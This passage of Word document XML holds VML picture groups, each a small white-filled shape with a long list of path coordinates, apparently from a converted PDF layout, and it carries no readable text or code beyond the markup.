,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2919,4121,2919,4121,2919,4121,2919,4121,2919,4121,2919,4121,2919,4121,2918,4121,2918,4121,2918,4121,2918,4121,2917,4121,2917,4121,2917,4121,2917,4121,2916,4121,2916,4121,2916,4121,2915,4121,2915,4121,2914,4121,2914,4121,2914,4121,2913,4121,2913,4121,2912,4121,2912,4121,2911,4121,2910,4121,2910,4121,2909,4121,2909,4121,2908,4121,2907,4121,2907,4121,2906,4121,2905,4121,2904,4121,2903,4121,2903,4121,2902,4121,2901,4121,2900,4121,2899,4121,2898,4121,2897,4121,2896,4121,2895,4121,2894,4121,2893,4121,2892,4121,2890,4121,2889,4121,2888,4121,2887,4121,2885,4121,2884,4121,2883,4121,2881,4121,2880,4121,2878,4121,2877,4121,2875,4121,2874,4121,2872,4121,2870,4121,2869,4121,2867,4121,2865,4121,2863,4121,2861,4121,2859,4121,2857,4121,2855,4121,2853,4121,2851,4121,2849,4121,2847,4121,2845,4121,2843,4121,2840,4121,2838,4121,2836,4121,2833,4121,2831,4121,2828,4121,2826,4121,2823,4121,2820,4121,2818,4121,2815,4121,2812,4121,2809,4121,2806,4121,2803,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4120,2800,4120,2800,4120,2800,4120,2800,4120,2800,4120,2800,4119,2800,4119,2800,4119,2800,4119,2800,4118,2800,4118,2800,4118,2800,4117,2800,4117,2800,4117,2800,4116,2800,4116,2800,4115,2800,4115,2800,4114,2800,4113,2800,4113,2800,4112,2800,4111,2800,4111,2800,4110,2800,4109,2800,4108,2800,4107,2800,4106,2800,4105,2800,4104,2800,4103,2800,4102,2800,4101,2800,4100,2800,4099,2800,4097,2800,4096,2800,4094,2800,4093,2800,4092,2800,4090,2800,4088,2800,4087,2800,4085,2800,4083,2800,4081,2800,4079,2800,4078,2800,4076,2800,4073,2800,4071,2800,4069,2800,4067,2800,4065,2800,4062,2800,4060,2800,4057,2800,4055,2800,4052,2800,4049,2800,4046,2800,4044,2800,4041,2800,4038,2800,4035,2800,4031,2800,4028,2800,4025,2800,4021,2800,4018,2800,4014,2800,4011,2800,4007,2800,4003,2800,3999,2800,3995,2800,3991,2800,3987,2800,3983,2800,3979,2800,3974,2800,3970,2800,3965,2800,3960,2800,3956,2800,3951,2800,3946,2800,3941,2800,3936,2800,3930,2800,3925,2800,3920,2800,3914,2800,3908,2800,3903,2800,3897,2800,3891,2800,3885,2800,3879,2800,3872,2800,3866e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:224.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,4490" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:4490;width:130;height:270" coordorigin="2790,4490" coordsize="130,270" path="m2800,4511l2800,4511,2800,4511,2800,4511,2800,4511,2800,4511,2800,4511,2800,4511,2800,4511,2800,4511,2800,4511,2800,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2802,4511,2802,4511,2802,4511,2802,4511,2802,4511,2802,4511,2803,4511,2803,4511,2803,4511,2803,4511,2803,4511,2804,4511,2804,4511,2804,4511,2805,4511,2805,4511,2805,4511,2806,4511,2806,4511,2806,4511,2807,4511,2807,4511,2808,4511,2808,4511,2809,4511,2809,4511,2810,4511,2810,4511,2811,4511,2812,4511,2812,4511,2813,4511,2814,4511,2814,4511,2815,4511,2816,4511,2817,4511,2817,4511,2818,4511,2819,4511,2820,4511,2821,4511,2822,4511,2823,4511,2824,4511,2825,4511,2826,4511,2827,4511,2828,4511,2829,4511,2830,4511,2832,4511,2833,4511,2834,4511,2836,4511,2837,4511,2838,4511,2840,4511,2841,4511,2843,4511,2844,4511,2846,4511,2847,4511,2849,4511,2851,4511,2852,4511,2854,4511,2856,4511,2858,4511,2860,4511,2861,4511,2863,4511,2865,4511,2867,4511,2870,4511,2872,4511,2874,4511,2876,4511,2878,4511,2881,4511,2883,4511,2885,4511,2888,4511,2890,4511,2893,4511,2895,4511,2898,4511,2901,4511,2903,4511,2906,4511,2909,4511,2912,4511,2915,4511,2917,4511,2920,4511,2920,4511,2920,4511,2920,4511,2920,4511,2920,4511,2920,4511,2920,4511,2920,4511,2920,4511,2920,4511,2920,4511,2920,4511,2920,4512,2920,4512,2920,4512,2920,4512,2920,4512,2920,4512,2920,4512,2920,4512,2920,4512,2920,4513,2920,4513,2920,4513,2920,4513,2920,4514,2920,4514,2920,4514,2920,4515,2920,4515,2920,4515,2920,4516,2920,4516,2920,4517,2920,4517,2920,4518,2920,4518,2920,4519,2920,4520,2920,4520,2920,4521,2920,4522,2920,4522,2920,4523,2920,4524,2920,4525,2920,4526,2920,4527,2920,4528,2920,4529,2920,4530,2920,4531,2920,4533,2920,4534,2920,4535,2920,4536,2920,4538,2920,4539,2920,4541,2920,4542,2920,4544,2920,4546,2920,4547,2920,4549,2920,4551,2920,4553,2920,4555,2920,4557,2920,4559,2920,4561,2920,4563,2920,4565,2920,4568,2920,4570,2920,4573,2920,4575,2920,4578,2920,4580,2920,4583,2920,4586,2920,4589,2920,4592,2920,4595,2920,4598,2920,4601,2920,4604,2920,4608,2920,4611,2920,4614,2920,4618,2920,4622,2920,4625,2920,4629,2920,4633,2920,4637,2920,4641,2920,4645,2920,4649,2920,4654,2920,4658,2920,4663,2920,4667,2920,4672,2920,4677,2920,4682,2920,4687,2920,4692,2920,4697,2920,4702,2920,4707,2920,4713,2920,4718,2920,4724,2920,4730,2920,4736,2920,4742,2920,4748,2920,4754,2920,4760,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2920,4766,2919,4766,2919,4766,2919,4766,2919,4766,2919,4766,2919,4766,2919,4766,2918,4766,2918,4766,2918,4766,2918,4766,2917,4766,2917,4766,2917,4766,2917,4766,2916,4766,2916,4766,2916,4766,2915,4766,2915,4766,2914,4766,2914,4766,2914,4766,2913,4766,2913,4766,2912,4766,2912,4766,2911,4766,2910,4766,2910,4766,2909,4766,2909,4766,2908,4766,2907,4766,2907,4766,2906,4766,2905,4766,2904,4766,2903,4766,2903,4766,2902,4766,2901,4766,2900,4766,2899,4766,2898,4766,2897,4766,2896,4766,2895,4766,2894,4766,2893,4766,2892,4766,2890,4766,2889,4766,2888,4766,2887,4766,2885,4766,2884,4766,2883,4766,2881,4766,2880,4766,2878,4766,2877,4766,2875,4766,2874,4766,2872,4766,2870,4766,2869,4766,2867,4766,2865,4766,2863,4766,2861,4766,2859,4766,2857,4766,2855,4766,2853,4766,2851,4766,2849,4766,2847,4766,2845,4766,2843,4766,2840,4766,2838,4766,2836,4766,2833,4766,2831,4766,2828,4766,2826,4766,2823,4766,2820,4766,2818,4766,2815,4766,2812,4766,2809,4766,2806,4766,2803,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4766,2800,4765,2800,4765,2800,4765,2800,4765,2800,4765,2800,4764,2800,4764,2800,4764,2800,4763,2800,4763,2800,4763,2800,4762,2800,4762,2800,4761,2800,4761,2800,4760,2800,4760,2800,4759,2800,4759,2800,4758,2800,4757,2800,4757,2800,4756,2800,4755,2800,4754,2800,4753,2800,4753,2800,4752,2800,4751,2800,4750,2800,4749,2800,4747,2800,4746,2800,4745,2800,4744,2800,4743,2800,4741,2800,4740,2800,4738,2800,4737,2800,4735,2800,4734,2800,4732,2800,4730,2800,4729,2800,4727,2800,4725,2800,4723,2800,4721,2800,4719,2800,4717,2800,4714,2800,4712,2800,4710,2800,4707,2800,4705,2800,4703,2800,4700,2800,4697,2800,4695,2800,4692,2800,4689,2800,4686,2800,4683,2800,4680,2800,4677,2800,4673,2800,4670,2800,4667,2800,4663,2800,4660,2800,4656,2800,4652,2800,4649,2800,4645,2800,4641,2800,4637,2800,4632,2800,4628,2800,4624,2800,4619,2800,4615,2800,4610,2800,4606,2800,4601,2800,4596,2800,4591,2800,4586,2800,4581,2800,4576,2800,4570,2800,4565,2800,4559,2800,4554,2800,4548,2800,4542,2800,4536,2800,4530,2800,4524,2800,4518,2800,4511e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:256.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,5130" coordsize="130,250">
        <v:shape style="position:absolute;left:2790;top:5130;width:130;height:250" coordorigin="2790,5130" coordsize="130,250" path="m2800,5142l2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2800,5142,2801,5142,2801,5142,2801,5142,2801,5142,2801,5142,2801,5142,2801,5142,2801,5142,2801,5142,2801,5142,2801,5142,2801,5142,2801,5142,2801,5142,2802,5142,2802,5142,2802,5142,2802,5142,2802,5142,2802,5142,2803,5142,2803,5142,2803,5142,2803,5142,2803,5142,2804,5142,2804,5142,2804,5142,2805,5142,2805,5142,2805,5142,2806,5142,2806,5142,2806,5142,2807,5142,2807,5142,2808,5142,2808,5142,2809,5142,2809,5142,2810,5142,2810,5142,2811,5142,2812,5142,2812,5142,2813,5142,2814,5142,2814,5142,2815,5142,2816,5142,2817,5142,2817,5142,2818,5142,2819,5142,2820,5142,2821,5142,2822,5142,2823,5142,2824,5142,2825,5142,2826,5142,2827,5142,2828,5142,2829,5142,2830,5142,2832,5142,2833,5142,2834,5142,2836,5142,2837,5142,2838,5142,2840,5142,2841,5142,2843,5142,2844,5142,2846,5142,2847,5142,2849,5142,2851,5142,2852,5142,2854,5142,2856,5142,2858,5142,2860,5142,2861,5142,2863,5142,2865,5142,2867,5142,2870,5142,2872,5142,2874,5142,2876,5142,2878,5142,2881,5142,2883,5142,2885,5142,2888,5142,2890,5142,2893,5142,2895,5142,2898,5142,2901,5142,2903,5142,2906,5142,2909,5142,2912,5142,2915,5142,2917,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5142,2920,5143,2920,5143,2920,5143,2920,5143,2920,5143,2920,5144,2920,5144,2920,5144,2920,5145,2920,5145,2920,5145,2920,5146,2920,5146,2920,5147,2920,5147,2920,5148,2920,5148,2920,5149,2920,5149,2920,5150,2920,5151,2920,5151,2920,5152,2920,5153,2920,5154,2920,5154,2920,5155,2920,5156,2920,5157,2920,5158,2920,5159,2920,5161,2920,5162,2920,5163,2920,5164,2920,5165,2920,5167,2920,5168,2920,5170,2920,5171,2920,5173,2920,5174,2920,5176,2920,5178,2920,5179,2920,5181,2920,5183,2920,5185,2920,5187,2920,5189,2920,5191,2920,5194,2920,5196,2920,5198,2920,5200,2920,5203,2920,5205,2920,5208,2920,5211,2920,5213,2920,5216,2920,5219,2920,5222,2920,5225,2920,5228,2920,5231,2920,5235,2920,5238,2920,5241,2920,5245,2920,5248,2920,5252,2920,5256,2920,5259,2920,5263,2920,5267,2920,5271,2920,5276,2920,5280,2920,5284,2920,5288,2920,5293,2920,5298,2920,5302,2920,5307,2920,5312,2920,5317,2920,5322,2920,5327,2920,5332,2920,5338,2920,5343,2920,5349,2920,5354,2920,5360,2920,5366,2920,5372,2920,5378,2920,5384,2920,5390,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2919,5397,2919,5397,2919,5397,2919,5397,2919,5397,2919,5397,2919,5397,2918,5397,2918,5397,2918,5397,2918,5397,2917,5397,2917,5397,2917,5397,2917,5397,2916,5397,2916,5397,2916,5397,2915,5397,2915,5397,2914,5397,2914,5397,2914,5397,2913,5397,2913,5397,2912,5397,2912,5397,2911,5397,2910,5397,2910,5397,2909,5397,2909,5397,2908,5397,2907,5397,2907,5397,2906,5397,2905,5397,2904,5397,2903,5397,2903,5397,2902,5397,2901,5397,2900,5397,2899,5397,2898,5397,2897,5397,2896,5397,2895,5397,2894,5397,2893,5397,2892,5397,2890,5397,2889,5397,2888,5397,2887,5397,2885,5397,2884,5397,2883,5397,2881,5397,2880,5397,2878,5397,2877,5397,2875,5397,2874,5397,2872,5397,2870,5397,2869,5397,2867,5397,2865,5397,2863,5397,2861,5397,2859,5397,2857,5397,2855,5397,2853,5397,2851,5397,2849,5397,2847,5397,2845,5397,2843,5397,2840,5397,2838,5397,2836,5397,2833,5397,2831,5397,2828,5397,2826,5397,2823,5397,2820,5397,2818,5397,2815,5397,2812,5397,2809,5397,2806,5397,2803,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5396,2800,5396,2800,5396,2800,5396,2800,5396,2800,5396,2800,5396,2800,5396,2800,5396,2800,5395,2800,5395,2800,5395,2800,5395,2800,5394,2800,5394,2800,5394,2800,5393,2800,5393,2800,5393,2800,5392,2800,5392,2800,5391,2800,5391,2800,5390,2800,5390,2800,5389,2800,5388,2800,5388,2800,5387,2800,5386,2800,5385,2800,5385,2800,5384,2800,5383,2800,5382,2800,5381,2800,5380,2800,5379,2800,5378,2800,5377,2800,5375,2800,5374,2800,5373,2800,5372,2800,5370,2800,5369,2800,5367,2800,5366,2800,5364,2800,5362,2800,5361,2800,5359,2800,5357,2800,5355,2800,5353,2800,5351,2800,5349,2800,5347,2800,5345,2800,5343,2800,5340,2800,5338,2800,5335,2800,5333,2800,5330,2800,5328,2800,5325,2800,5322,2800,5319,2800,5316,2800,5313,2800,5310,2800,5307,2800,5304,2800,5300,2800,5297,2800,5294,2800,5290,2800,5286,2800,5283,2800,5279,2800,5275,2800,5271,2800,5267,2800,5263,2800,5259,2800,5254,2800,5250,2800,5245,2800,5241,2800,5236,2800,5231,2800,5226,2800,5221,2800,5216,2800,5211,2800,5206,2800,5201,2800,5195,2800,5190,2800,5184,2800,5178,2800,5172,2800,5166,2800,5160,2800,5154,2800,5148,2800,5142e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:288.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,5770" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:5770;width:130;height:270" coordorigin="2790,5770" coordsize="130,270" path="m2800,5787l2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2802,5787,2802,5787,2802,5787,2802,5787,2802,5787,2802,5787,2803,5787,2803,5787,2803,5787,2803,5787,2803,5787,2804,5787,2804,5787,2804,5787,2805,5787,2805,5787,2805,5787,2806,5787,2806,5787,2806,5787,2807,5787,2807,5787,2808,5787,2808,5787,2809,5787,2809,5787,2810,5787,2810,5787,2811,5787,2812,5787,2812,5787,2813,5787,2814,5787,2814,5787,2815,5787,2816,5787,2817,5787,2817,5787,2818,5787,2819,5787,2820,5787,2821,5787,2822,5787,2823,5787,2824,5787,2825,5787,2826,5787,2827,5787,2828,5787,2829,5787,2830,5787,2832,5787,2833,5787,2834,5787,2836,5787,2837,5787,2838,5787,2840,5787,2841,5787,2843,5787,2844,5787,2846,5787,2847,5787,2849,5787,2851,5787,2852,5787,2854,5787,2856,5787,2858,5787,2860,5787,2861,5787,2863,5787,2865,5787,2867,5787,2870,5787,2872,5787,2874,5787,2876,5787,2878,5787,2881,5787,2883,5787,2885,5787,2888,5787,2890,5787,2893,5787,2895,5787,2898,5787,2901,5787,2903,5787,2906,5787,2909,5787,2912,5787,2915,5787,2917,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5788,2920,5788,2920,5788,2920,5788,2920,5788,2920,5788,2920,5789,2920,5789,2920,5789,2920,5789,2920,5790,2920,5790,2920,5790,2920,5791,2920,5791,2920,5791,2920,5792,2920,5792,2920,5793,2920,5793,2920,5794,2920,5795,2920,5795,2920,5796,2920,5797,2920,5797,2920,5798,2920,5799,2920,5800,2920,5801,2920,5802,2920,5803,2920,5804,2920,5805,2920,5806,2920,5807,2920,5808,2920,5809,2920,5811,2920,5812,2920,5813,2920,5815,2920,5816,2920,5818,2920,5820,2920,5821,2920,5823,2920,5825,2920,5827,2920,5828,2920,5830,2920,5832,2920,5835,2920,5837,2920,5839,2920,5841,2920,5843,2920,5846,2920,5848,2920,5851,2920,5853,2920,5856,2920,5859,2920,5862,2920,5864,2920,5867,2920,5870,2920,5873,2920,5877,2920,5880,2920,5883,2920,5887,2920,5890,2920,5894,2920,5897,2920,5901,2920,5905,2920,5909,2920,5913,2920,5917,2920,5921,2920,5925,2920,5929,2920,5934,2920,5938,2920,5943,2920,5948,2920,5952,2920,5957,2920,5962,2920,5967,2920,5972,2920,5978,2920,5983,2920,5988,2920,5994,2920,6000,2920,6005,2920,6011,2920,6017,2920,6023,2920,6029,2920,6036,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2919,6042,2919,6042,2919,6042,2919,6042,2919,6042,2919,6042,2919,6042,2918,6042,2918,6042,2918,6042,2918,6042,2917,6042,2917,6042,2917,6042,2917,6042,2916,6042,2916,6042,2916,6042,2915,6042,2915,6042,2914,6042,2914,6042,2914,6042,2913,6042,2913,6042,2912,6042,2912,6042,2911,6042,2910,6042,2910,6042,2909,6042,2909,6042,2908,6042,2907,6042,2907,6042,2906,6042,2905,6042,2904,6042,2903,6042,2903,6042,2902,6042,2901,6042,2900,6042,2899,6042,2898,6042,2897,6042,2896,6042,2895,6042,2894,6042,2893,6042,2892,6042,2890,6042,2889,6042,2888,6042,2887,6042,2885,6042,2884,6042,2883,6042,2881,6042,2880,6042,2878,6042,2877,6042,2875,6042,2874,6042,2872,6042,2870,6042,2869,6042,2867,6042,2865,6042,2863,6042,2861,6042,2859,6042,2857,6042,2855,6042,2853,6042,2851,6042,2849,6042,2847,6042,2845,6042,2843,6042,2840,6042,2838,6042,2836,6042,2833,6042,2831,6042,2828,6042,2826,6042,2823,6042,2820,6042,2818,6042,2815,6042,2812,6042,2809,6042,2806,6042,2803,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6041,2800,6041,2800,6041,2800,6041,2800,6041,2800,6041,2800,6040,2800,6040,2800,6040,2800,6040,2800,6039,2800,6039,2800,6039,2800,6038,2800,6038,2800,6038,2800,6037,2800,6037,2800,6036,2800,6036,2800,6035,2800,6034,2800,6034,2800,6033,2800,6032,2800,6032,2800,6031,2800,6030,2800,6029,2800,6028,2800,6027,2800,6026,2800,6025,2800,6024,2800,6023,2800,6022,2800,6021,2800,6019,2800,6018,2800,6017,2800,6015,2800,6014,2800,6012,2800,6011,2800,6009,2800,6008,2800,6006,2800,6004,2800,6002,2800,6000,2800,5999,2800,5997,2800,5994,2800,5992,2800,5990,2800,5988,2800,5986,2800,5983,2800,5981,2800,5978,2800,5976,2800,5973,2800,5970,2800,5967,2800,5965,2800,5962,2800,5959,2800,5955,2800,5952,2800,5949,2800,5946,2800,5942,2800,5939,2800,5935,2800,5932,2800,5928,2800,5924,2800,5920,2800,5916,2800,5912,2800,5908,2800,5904,2800,5900,2800,5895,2800,5891,2800,5886,2800,5881,2800,5877,2800,5872,2800,5867,2800,5862,2800,5857,2800,5851,2800,5846,2800,5841,2800,5835,2800,5829,2800,5824,2800,5818,2800,5812,2800,5806,2800,5800,2800,5793,2800,5787e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:319.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,6390" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:6390;width:130;height:270" coordorigin="2790,6390" coordsize="130,270" path="m2800,6417l2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2802,6417,2802,6417,2802,6417,2802,6417,2802,6417,2802,6417,2803,6417,2803,6417,2803,6417,2803,6417,2803,6417,2804,6417,2804,6417,2804,6417,2805,6417,2805,6417,2805,6417,2806,6417,2806,6417,2806,6417,2807,6417,2807,6417,2808,6417,2808,6417,2809,6417,2809,6417,2810,6417,2810,6417,2811,6417,2812,6417,2812,6417,2813,6417,2814,6417,2814,6417,2815,6417,2816,6417,2817,6417,2817,6417,2818,6417,2819,6417,2820,6417,2821,6417,2822,6417,2823,6417,2824,6417,2825,6417,2826,6417,2827,6417,2828,6417,2829,6417,2830,6417,2832,6417,2833,6417,2834,6417,2836,6417,2837,6417,2838,6417,2840,6417,2841,6417,2843,6417,2844,6417,2846,6417,2847,6417,2849,6417,2851,6417,2852,6417,2854,6417,2856,6417,2858,6417,2860,6417,2861,6417,2863,6417,2865,6417,2867,6417,2870,6417,2872,6417,2874,6417,2876,6417,2878,6417,2881,6417,2883,6417,2885,6417,2888,6417,2890,6417,2893,6417,2895,6417,2898,6417,2901,6417,2903,6417,2906,6417,2909,6417,2912,6417,2915,6417,2917,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6418,2920,6418,2920,6418,2920,6418,2920,6418,2920,6418,2920,6418,2920,6418,2920,6419,2920,6419,2920,6419,2920,6419,2920,6420,2920,6420,2920,6420,2920,6421,2920,6421,2920,6421,2920,6422,2920,6422,2920,6423,2920,6423,2920,6424,2920,6424,2920,6425,2920,6426,2920,6426,2920,6427,2920,6428,2920,6428,2920,6429,2920,6430,2920,6431,2920,6432,2920,6433,2920,6434,2920,6435,2920,6436,2920,6437,2920,6439,2920,6440,2920,6441,2920,6442,2920,6444,2920,6445,2920,6447,2920,6448,2920,6450,2920,6452,2920,6453,2920,6455,2920,6457,2920,6459,2920,6461,2920,6463,2920,6465,2920,6467,2920,6469,2920,6471,2920,6474,2920,6476,2920,6479,2920,6481,2920,6484,2920,6486,2920,6489,2920,6492,2920,6495,2920,6498,2920,6501,2920,6504,2920,6507,2920,6510,2920,6514,2920,6517,2920,6520,2920,6524,2920,6528,2920,6531,2920,6535,2920,6539,2920,6543,2920,6547,2920,6551,2920,6555,2920,6560,2920,6564,2920,6569,2920,6573,2920,6578,2920,6583,2920,6588,2920,6592,2920,6598,2920,6603,2920,6608,2920,6613,2920,6619,2920,6624,2920,6630,2920,6636,2920,6642,2920,6647,2920,6654,2920,6660,2920,6666,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2919,6672,2919,6672,2919,6672,2919,6672,2919,6672,2919,6672,2919,6672,2918,6672,2918,6672,2918,6672,2918,6672,2917,6672,2917,6672,2917,6672,2917,6672,2916,6672,2916,6672,2916,6672,2915,6672,2915,6672,2914,6672,2914,6672,2914,6672,2913,6672,2913,6672,2912,6672,2912,6672,2911,6672,2910,6672,2910,6672,2909,6672,2909,6672,2908,6672,2907,6672,2907,6672,2906,6672,2905,6672,2904,6672,2903,6672,2903,6672,2902,6672,2901,6672,2900,6672,2899,6672,2898,6672,2897,6672,2896,6672,2895,6672,2894,6672,2893,6672,2892,6672,2890,6672,2889,6672,2888,6672,2887,6672,2885,6672,2884,6672,2883,6672,2881,6672,2880,6672,2878,6672,2877,6672,2875,6672,2874,6672,2872,6672,2870,6672,2869,6672,2867,6672,2865,6672,2863,6672,2861,6672,2859,6672,2857,6672,2855,6672,2853,6672,2851,6672,2849,6672,2847,6672,2845,6672,2843,6672,2840,6672,2838,6672,2836,6672,2833,6672,2831,6672,2828,6672,2826,6672,2823,6672,2820,6672,2818,6672,2815,6672,2812,6672,2809,6672,2806,6672,2803,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6671,2800,6671,2800,6671,2800,6671,2800,6671,2800,6671,2800,6670,2800,6670,2800,6670,2800,6669,2800,6669,2800,6669,2800,6668,2800,6668,2800,6667,2800,6667,2800,6666,2800,6666,2800,6665,2800,6665,2800,6664,2800,6663,2800,6663,2800,6662,2800,6661,2800,6660,2800,6659,2800,6659,2800,6658,2800,6657,2800,6656,2800,6655,2800,6653,2800,6652,2800,6651,2800,6650,2800,6649,2800,6647,2800,6646,2800,6644,2800,6643,2800,6641,2800,6640,2800,6638,2800,6636,2800,6634,2800,6633,2800,6631,2800,6629,2800,6627,2800,6625,2800,6623,2800,6620,2800,6618,2800,6616,2800,6613,2800,6611,2800,6608,2800,6606,2800,6603,2800,6601,2800,6598,2800,6595,2800,6592,2800,6589,2800,6586,2800,6583,2800,6579,2800,6576,2800,6573,2800,6569,2800,6566,2800,6562,2800,6558,2800,6554,2800,6551,2800,6547,2800,6543,2800,6538,2800,6534,2800,6530,2800,6525,2800,6521,2800,6516,2800,6512,2800,6507,2800,6502,2800,6497,2800,6492,2800,6487,2800,6482,2800,6476,2800,6471,2800,6465,2800,6460,2800,6454,2800,6448,2800,6442,2800,6436,2800,6430,2800,6424,2800,6417e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:352.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,7050" coordsize="130,250">
        <v:shape style="position:absolute;left:2790;top:7050;width:130;height:250" coordorigin="2790,7050" coordsize="130,250" path="m2800,7063l2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2802,7063,2802,7063,2802,7063,2802,7063,2802,7063,2802,7063,2803,7063,2803,7063,2803,7063,2803,7063,2803,7063,2804,7063,2804,7063,2804,7063,2805,7063,2805,7063,2805,7063,2806,7063,2806,7063,2806,7063,2807,7063,2807,7063,2808,7063,2808,7063,2809,7063,2809,7063,2810,7063,2810,7063,2811,7063,2812,7063,2812,7063,2813,7063,2814,7063,2814,7063,2815,7063,2816,7063,2817,7063,2817,7063,2818,7063,2819,7063,2820,7063,2821,7063,2822,7063,2823,7063,2824,7063,2825,7063,2826,7063,2827,7063,2828,7063,2829,7063,2830,7063,2832,7063,2833,7063,2834,7063,2836,7063,2837,7063,2838,7063,2840,7063,2841,7063,2843,7063,2844,7063,2846,7063,2847,7063,2849,7063,2851,7063,2852,7063,2854,7063,2856,7063,2858,7063,2860,7063,2861,7063,2863,7063,2865,7063,2867,7063,2870,7063,2872,7063,2874,7063,2876,7063,2878,7063,2881,7063,2883,7063,2885,7063,2888,7063,2890,7063,2893,7063,2895,7063,2898,7063,2901,7063,2903,7063,2906,7063,2909,7063,2912,7063,2915,7063,2917,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7064,2920,7064,2920,7064,2920,7064,2920,7064,2920,7065,2920,7065,2920,7065,2920,7066,2920,7066,2920,7066,